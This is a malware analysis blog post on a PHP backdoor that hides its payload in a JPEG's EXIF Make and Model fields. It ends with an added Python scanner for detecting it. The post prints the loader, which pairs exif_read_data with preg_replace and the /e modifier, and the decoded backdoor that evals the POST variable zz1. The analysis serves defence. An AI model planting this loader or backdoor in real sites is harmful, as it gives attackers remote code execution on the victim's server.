Malware Hidden Inside JPG EXIF Headers

Source: Internet
Author: User

A few days ago, Peter Gramantik from our research team found a very interesting backdoor on a compromised site. This backdoor didn't rely on the normal patterns to hide its content (like base64/gzip encoding), but stored its data in the EXIF headers of a JPEG image. It also used the exif_read_data and preg_replace PHP functions to read the headers and execute itself.

Technical Details

The backdoor is divided into two parts. The first part is a mix of the exif_read_data function to read the image headers and the preg_replace function to execute the content. This is what we found in the compromised site:

    $exif = exif_read_data('/homepages/clientsitepath/images/stories/food/bun.jpg');
    preg_replace($exif['Make'], $exif['Model'], '');

Both functions are harmless by themselves. exif_read_data is commonly used to read images, and preg_replace to replace the content of strings. However, preg_replace has a hidden and tricky option: if you pass the "/e" modifier, it will execute the content (eval) instead of just searching/replacing.

When we look at the bun.jpg file, we find the second part of the backdoor:

    ÿØÿà^@^PJFIF^@^A^B^@d^@ÿá^@¡Exif^@II*^@^H^@^B^@^O^A^B^@^F^@&^@^P^A^B^@m^@,^@/.*/e^@ eval (base64_decode("aWYgKGl zc2V0KCRfUE9TVFsie...='));@ÿì^@^QDucky^@^A^@^D^@<^@ÿî^@^NAdobe^

The file starts normally with the common headers, but in the "Make" header it has a strange keyword: "/.*/e". That's the exact modifier used by preg_replace to execute (eval) whatever is passed to it.

Now things are getting interesting. If we keep looking at the EXIF data, we can see the "eval (base64_decode" hidden inside the "Model" header. When you put it all together, we can see what is going on. The attackers are reading both the Make and Model headers from the EXIF and filling the preg_replace call with them. Once we substitute $exif['Make'] and $exif['Model'] with what is in the file, we get the final backdoor:

    preg_replace("/.*/e", "@ eval (base64_decode(\"aWYgKGl...\"));", '');

Once decoded, we can see that it just executes whatever content is provided by the POST variable zz1. The full decoded backdoor is here:

    if (isset($_POST["zz1"])) { eval(stripslashes($_POST["zz1"])); }

Steganography Malware

Another interesting point is that bun.jpg and the other images that were compromised still load and work properly. In fact, on these compromised sites, the attackers modified a legitimate, pre-existing image from the site. This is a curious steganographic way to hide the malware.

Note: Any Sucuri clients using Server Side Scanning are protected against this type of injection (detected by us).
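
A scanner for the pattern described above, added here as an illustration and not part of the original post or of any Sucuri tooling: it reads the ASCII fields (Make, Model) from a JPEG's EXIF block and flags a regex carrying the /e modifier or PHP code tokens. The function names, the heuristics and the sample file built by build_sample are assumptions made for this example.

```python
import re
import struct

TAGS = {0x010F: "Make", 0x0110: "Model"}  # the two EXIF fields the backdoor reads
# A delimited pattern whose trailing flags include 'e', such as "/.*/e"
E_MODIFIER = re.compile(rb"^\s*([/#~|@!%]).*\1[a-zA-Z]*e[a-zA-Z]*\s*$", re.S)
PHP_CODE = re.compile(rb"eval\s*\(|base64_decode|<\?php|\$_(POST|GET|REQUEST|COOKIE)", re.I)

def exif_ascii_tags(jpeg):
    """Return {tag_id: bytes} for ASCII entries in IFD0 of the first Exif APP1 segment."""
    pos = 2 if jpeg[:2] == b"\xff\xd8" else len(jpeg)
    while pos + 4 <= len(jpeg) and jpeg[pos] == 0xFF and jpeg[pos + 1] != 0xDA:
        seglen = struct.unpack(">H", jpeg[pos + 2:pos + 4])[0]
        body = jpeg[pos + 4:pos + 2 + seglen]
        if jpeg[pos + 1] == 0xE1 and body[:6] == b"Exif\x00\x00":
            return parse_ifd0(body[6:])
        pos += 2 + seglen
    return {}

def parse_ifd0(tiff):
    if len(tiff) < 10 or tiff[:2] not in (b"II", b"MM"):
        return {}
    e = "<" if tiff[:2] == b"II" else ">"  # TIFF byte order
    ifd = struct.unpack(e + "I", tiff[4:8])[0]
    count = struct.unpack(e + "H", tiff[ifd:ifd + 2])[0] if ifd + 2 <= len(tiff) else 0
    tags = {}
    for i in range(count):
        entry = tiff[ifd + 2 + 12 * i:ifd + 14 + 12 * i]
        if len(entry) < 12:
            break  # truncated directory
        tag, typ, n, val = struct.unpack(e + "HHI4s", entry)
        if typ == 2:  # ASCII; values longer than 4 bytes live at an offset
            off = struct.unpack(e + "I", val)[0]
            tags[tag] = (val[:n] if n <= 4 else tiff[off:off + n]).rstrip(b"\x00")
    return tags

def scan(jpeg):
    """Return sorted (field, reason) findings for one JPEG's raw bytes."""
    checks = (("pcre-e-modifier", E_MODIFIER.match), ("php-code", PHP_CODE.search))
    return sorted((TAGS.get(tag, hex(tag)), reason)
                  for tag, value in exif_ascii_tags(jpeg).items()
                  for reason, check in checks if check(value))

def build_sample(make, model):
    """Constructed sample: SOI + Exif APP1 holding Make/Model (each > 3 bytes) + EOI."""
    make, model = make + b"\x00", model + b"\x00"
    ifd = struct.pack("<HHHII", 2, 0x010F, 2, len(make), 38)
    ifd += struct.pack("<HHIII", 0x0110, 2, len(model), 38 + len(make), 0)
    app1 = b"Exif\x00\x00II*\x00" + struct.pack("<I", 8) + ifd + make + model
    return b"\xff\xd8\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"
```

Both checks are heuristics, so review each finding by hand and pair the image scan with a search of the site's PHP files for exif_read_data output being passed to preg_replace. The /e modifier was deprecated in PHP 5.5.0 and removed in PHP 7.0.0, so this loader only executes on older PHP versions.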
